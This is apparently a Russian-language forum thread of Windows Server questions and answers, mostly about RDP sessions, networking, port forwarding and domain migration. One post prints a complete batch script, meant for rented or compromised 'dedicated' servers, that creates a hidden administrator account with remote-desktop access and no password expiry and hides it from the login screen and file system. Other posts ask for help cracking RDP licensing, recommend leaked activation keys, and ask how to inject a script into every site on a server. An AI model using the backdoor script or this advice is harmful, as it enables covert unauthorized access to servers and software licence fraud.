Вопросы и ответы - Windows Сервера.

Discussion in 'Windows' started by zythar, 4 Jul 2008.

  1. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,766
    Likes Received:
    836
    Reputations:
    857
    Как вариант - кто-то принудительно тебе делает logoff
     
    _________________________
  2. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    289
    Likes Received:
    55
    Reputations:
    20
    думал об этом, но это происходит очень часто, а все юзеры у меня под слежкой через RMS
     
  3. zeoman

    zeoman Elder - Старейшина

    Joined:
    17 Jun 2010
    Messages:
    38
    Likes Received:
    42
    Reputations:
    43
    Проверь сесии

    по этой статейки http://dservers.ru/lecheniya-razryva-rdp-sessij-na-dedikax-windows-server-2008/
     
  4. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    289
    Likes Received:
    55
    Reputations:
    20
    Спасибо за помощь! То что нужно.
     
  5. Radist

    Radist New Member

    Joined:
    5 Jul 2012
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Ув. Администраторы, подскажите новичку. Я хочу научиться администрировать игровой сервер(GTA). Что для этого надо изучить, желательно с самых основ. Есть небольшой опыт работы в С++.
     
    #245 Radist, 17 Oct 2012
    Last edited: 17 Oct 2012
  6. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    289
    Likes Received:
    55
    Reputations:
    20
    глянь http://www.youtube.com/watch?v=SWXmVoF5Agg
     
  7. Radist

    Radist New Member

    Joined:
    5 Jul 2012
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Спасибо, это полезная информация.
     
  8. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    289
    Likes Received:
    55
    Reputations:
    20
    на дедике не работает инет что может быть?

    [​IMG]
     
  9. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,766
    Likes Received:
    836
    Reputations:
    857
    Например файрволл. Или недействующая (прописанная в браузере) прокся. Или зарезан сайт на межсетевом экране. Или microsoft.com прописан как localhost

    Куча вариантов на самом деле.
     
    _________________________
  10. GoodGoogle

    GoodGoogle Moderator

    Joined:
    5 Aug 2011
    Messages:
    1,132
    Likes Received:
    317
    Reputations:
    225
    В данной учетки выключен интернет. Посмотри сетевые подключения, сделай пинг до google.com и скажи ответ тут.
    Пуск->Выполнить->cmd->ping google.com
     
  11. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,766
    Likes Received:
    836
    Reputations:
    857
    Да ладно ? Мож и сетевой кабель выткнут ?)
     
    _________________________
  12. AntiFraeR

    AntiFraeR New Member

    Joined:
    14 May 2013
    Messages:
    47
    Likes Received:
    4
    Reputations:
    0
    Как открыть порт на ХР для удаленного доступа к аппарату?..
    в модеме Старнет-роутер(подключен через ЛАН) пробовал создание вирт.сервера с открытием порта
    2 в брандмаузере(выключен) добавлял в службы открытие порта
    3 выключал антивирь
    4 регистрировался на НО-айпи создавал хост установил ДЮК
    И после этих манипуляций проверил сканером портов на компьютере - порт открыт, а онлайн сканер такой как 2айпи говорит закрыт..

    возможно что провайдер блокирует?
     
  13. tester_new

    tester_new Elder - Старейшина

    Joined:
    12 Feb 2012
    Messages:
    260
    Likes Received:
    32
    Reputations:
    24
    Если я верно понял у тебя роутер? Сначала попробуй проверь доступ к своему порту в локальной сети а не из интернета.

    Если приложение/сервер которое ты пробуешь пробросить в мир использует TCP протокол то ты увидешь набор цифр, непонятных символов или просто мерцающий курсор, скорее всего это значит что твой порт открыт, и тебе нужно смотреть где ты ошибся в пробросе этого порта на своем роутере.

    Просмотр открытых портов;
    Просмотр открытых портов и приложений которые их используют:
     
  14. _Malinovskiy_

    _Malinovskiy_ New Member

    Joined:
    25 Apr 2009
    Messages:
    17
    Likes Received:
    0
    Reputations:
    0
    Вот код который должен создавать скрытую учетку на деде(по утверждению автора), автору в асю отписал аська в оффе, может кто поможет его разобрать чтобы понять почему он не создает учетку? Тестировал на дедах win2003 r2 server. Код:
    echo Add an account "логин" with a password "пароль"
    Set AdmGroupSID=S-1-5-32-544
    Set AdmGroup=
    For /F "UseBackQ Tokens=1* Delims==" %%I In (`WMIC Group Where "SID = '%AdmGroupSID%'" Get Name /Value ^| Find "="`) Do Set AdmGroup=%%J
    Set AdmGroup=%AdmGroup:~0,-1%
    echo Adding to our account in "Administrators" group
    net user логин пароль /add
    net localgroup %AdmGroup% логин /add
    Set RDPGroupSID=S-1-5-32-555
    Set RDPGroup=
    For /F "UseBackQ Tokens=1* Delims==" %%I In (`WMIC Group Where "SID = '%RDPGroupSID%'" Get Name /Value ^| Find "="`) Do Set RDPGroup=%%J
    Set RDPGroup=%RDPGroup:~0,-1%
    echo Adding to our account in "Remote desktop users" group
    net localgroup "%RDPGroup%" логин /add
    echo Remove password expiration
    net accounts /maxpwage:unlimited
    echo If the folder does not exist yet, create it in XP\2003
    mkdir "C:\Documents and Settings\логин"
    echo And put on her attribute "system"
    attrib +s +a +r +h "C:\Documents and Settings\логин"
    echo If the folder does not exist yet, create it in 7\2008
    mkdir "C:\Users\логин"
    echo And put on her attribute "system"
    attrib +s +a +r +h "C:\Users\логин"
    echo Hide the account from the Winlogon
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v логин /t REG_DWORD /d 0 /f
    pause
     
  15. tester_new

    tester_new Elder - Старейшина

    Joined:
    12 Feb 2012
    Messages:
    260
    Likes Received:
    32
    Reputations:
    24
    Кинь сюда хоть вывод после работы этого всего дела.
    Вроде все верно, попробуй выполни команды последовательно глянь на каком этапе он стопориться.
     
  16. 8tomat8

    8tomat8 New Member

    Joined:
    8 Mar 2010
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    RDP лицензии

    На win serv 2008 r2 (x64) помогите крякнуть RDP terminal server. В начале мне дало 120 дней триала, но они неумолимо подходят к концу. Нашел маны на 2003, но не то походу.

    Подскажите кто сталкивался =)

    [​IMG]
     
  17. webdevolop

    webdevolop New Member

    Joined:
    31 Mar 2013
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Есть ли способ заинклудить фаил\скрипт во все сайты?
    Может в конфигах что прописать
     
  18. SergeyN

    SergeyN New Member

    Joined:
    12 Sep 2009
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    Делал методом 2003-го - работает.
    Где-то поднимал гипер-в(не только для этой задачи), на нем в минимуме 2003 и там сервер лицензирования под рдп.
     
  19. SVAROG

    SVAROG Elder - Старейшина

    Joined:
    13 Feb 2007
    Messages:
    424
    Likes Received:
    86
    Reputations:
    -1
    Три года назад находил ключик в инете и успешно активировал несколько десятков терминальных лицензий.
    Попробуй, может еще не все перебанили.
     
  20. SVAROG

    SVAROG Elder - Старейшина

    Joined:
    13 Feb 2007
    Messages:
    424
    Likes Received:
    86
    Reputations:
    -1
    Есть 2003 стандарт (единственный контроллер домена, в режиме совместимости 2000), старенький медленно умирающий hp proliant.
    Тут недавно появился 2012 стандарт и вот хочу произвести миграцию.
    Думаю начать надо с того что DC на 2003 перевести в режим совместимости 2003.
    Дальше я нашел подробную инструкцию по миграции домена с 2003 до 2008.
    Теперь вот думаю есть ли разница по переходу между 2008 и 2012, и какие подводные камни могут быть?
    Мануалов и инструкций по миграции и переходу с 2003 на 2008 полно, а вот с 2003 на 2012 я толком и не нашел.
    И что будет лучше, иметь два контроллера домена(для отказоустойчивости) или один на 2012?
    Рабочие ОС в домене: win XP,7,8
    Есть ли у кого опыт по миграции с 2003 на 2012, поделитесь советами.
     
Loading...
Similar Threads - Вопросы ответы Windows
  1. grifan
    Replies:
    18
    Views:
    1,916
  2. byte1986
    Replies:
    13
    Views:
    2,527
  3. antis17
    Replies:
    3
    Views:
    2,645
  4. FriLL
    Replies:
    4
    Views:
    2,092